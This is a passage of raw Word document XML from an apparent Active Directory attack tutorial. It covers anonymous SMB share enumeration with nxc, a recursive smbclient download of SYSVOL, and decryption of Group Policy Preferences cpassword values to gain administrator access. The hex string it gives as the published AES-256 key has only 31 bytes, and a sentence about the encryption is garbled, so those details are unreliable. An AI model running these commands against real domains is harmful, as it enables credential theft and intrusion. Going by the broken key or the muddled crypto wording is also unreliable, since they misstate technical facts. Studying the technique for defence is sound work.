            <w:r w:rsidR="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Enumerate visible shares across the target IdP endpoint</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">nxc smb &lt;DC_IP&gt; -u </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'anonymous'</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -p </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>' '</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="880000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>--shares</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidR="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2.</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="80340D" w:themeColor="accent2" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Authenticated recursive extraction of policy configurations and deployment scripts</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">smbclient </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'\\&lt;DC_IP&gt;\SYSVOL'</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -U </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'domain.local\low_priv_user'</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -c </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF0660">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="008800"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'prompt OFF; recurse ON; mget *'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38D7F79B" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="00676591" w:rsidRDefault="006D3130">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E68A43F" w14:textId="77777777" w:rsidR="006D3130" w:rsidRPr="006D3130" w:rsidRDefault="006D3130" w:rsidP="006D3130">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="391FD226" w14:textId="74E1D4DC" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00BE0FA4">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 xml:space="preserve">Purpose #1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NetExec (</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nxc</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) probes the Domain Controller (DC) to see what network folders are visible without having to log in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66957AF5" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BA7368B" w14:textId="17F73B5A" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00BE0FA4">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Mechanism #1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> It tests if the guest account or unauthenticated null sessions are enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BDE17A" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31352D8A" w14:textId="0F9AE7DE" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00BE0FA4">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Target #1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attackers look for non-standard shares or misconfigured permissions on default shares.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0618EA" w14:textId="3044C17B" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Authenticated Policy Extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64939FB9" w14:textId="283489B1" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00BE0FA4">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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Purpose #2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A low-privileged domain user downloads the entire </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory to a local machine for offline analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6D6768" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="605B3AE3" w14:textId="437FD724" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00BE0FA4">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Mechanism #2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> must be readable by all authenticated users because it distributes Group Policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EA19B5" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="776A0F6D" w14:textId="7224C6C3" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00BE0FA4">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Target #2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The downloaded files are then scraped for hardcoded credentials, connection strings, and sensitive deployment scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C46A725" w14:textId="77777777" w:rsidR="006F4908" w:rsidRDefault="006F4908" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A6CCAB" w14:textId="7EEA442E"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The Exploitation Vector: Group Policy Preferences (GPP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138E756A" w14:textId="66D55E4A"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Historically, administrators used GPP to automate tasks like setting local administrator passwords or mapping drives across the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E2A0C9" w14:textId="00CDA890"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Vulnerability. </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When a GPP rule is created, the configuration is saved as an </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> file (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Groups.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Drives.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) inside the public </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> share.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0672AB2A" w14:textId="1546A59A"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Flaw. </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Microsoft encrypted these passwords using a publicly known AES-256 key. Big no-no.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9A752D" w14:textId="61F3B580" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attackers search these XML files for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cpassword</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> attribute and easily decrypt it using open-source hacking tools (like </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gpp-decrypt</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) to gain immediate administrative access.</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42C76" w14:paraId="677C0EC1" w14:textId="77777777" w:rsidTr="00153AF6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="198E1930" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00153AF6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7B69181B" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00153AF6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">OTE </w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>📌</w:t>
            </w:r>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EED5572" w14:textId="77777777" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00153AF6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="13E3C5B7" w14:textId="2424B2D5" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00153AF6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00442C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Microsoft made a massive security blunder regarding Group Policy Preferences (GPP). The incident is considered one of the most notorious “open secrets” and design flaws in the history of Active Directory security.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C31399C" w14:textId="23529C49" w:rsidR="00442C76" w:rsidRDefault="00442C76" w:rsidP="00153AF6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D4EF056" w14:textId="77777777" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367DC50A" w14:textId="6B6C6B4B"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The Blunder: Publishing the Universal Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41281B68" w14:textId="0CAC1FD1"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 xml:space="preserve">When Microsoft introduced GPP in Windows Server 2008, it gave administrators a convenient way to push out local passwords (this was prior to LAPS), map network drives, and configure service accounts. To keep these passwords safe inside the public </w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SYSVOL</w:t>
      </w:r>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder, Microsoft encrypted them using a publicly known AES-256 key (as stated above) with bit encryption – which is mathematically highly secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D51E163" w14:textId="4047BBC4"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However, the architecture required every client computer in the domain to automatically decrypt and read the password to be able to apply the policy. Because of this, Microsoft hardcoded a single, static AES cryptographic key into the Windows operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3110CD1A" w14:textId="25FF9855"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The catastrophic mistake occurred around 2012 when Microsoft officially published this private AES decryption key on its public MSDN (Microsoft Developer Network) documentation website as part of its open specifications’ initiative.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Everyone noticed this – including attackers. It was a race against time for attackers and defenders from there on out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D95BCFB" w14:textId="77777777"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lastRenderedPageBreak/>
        <w:t>The Publicly Blundered Key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6870AD" w14:textId="447F96BD" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442C76">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 c1 5c b9 4f a0 79 54 6e 73 aa a0 25 3b 4e af</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7582FD65" w14:textId="36A35DF5"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The Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BA8A5A" w14:textId="6A69BCF5" w:rsidR="00442C76" w:rsidRPr="00442C76" w:rsidRDefault="00442C76" w:rsidP="00442C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
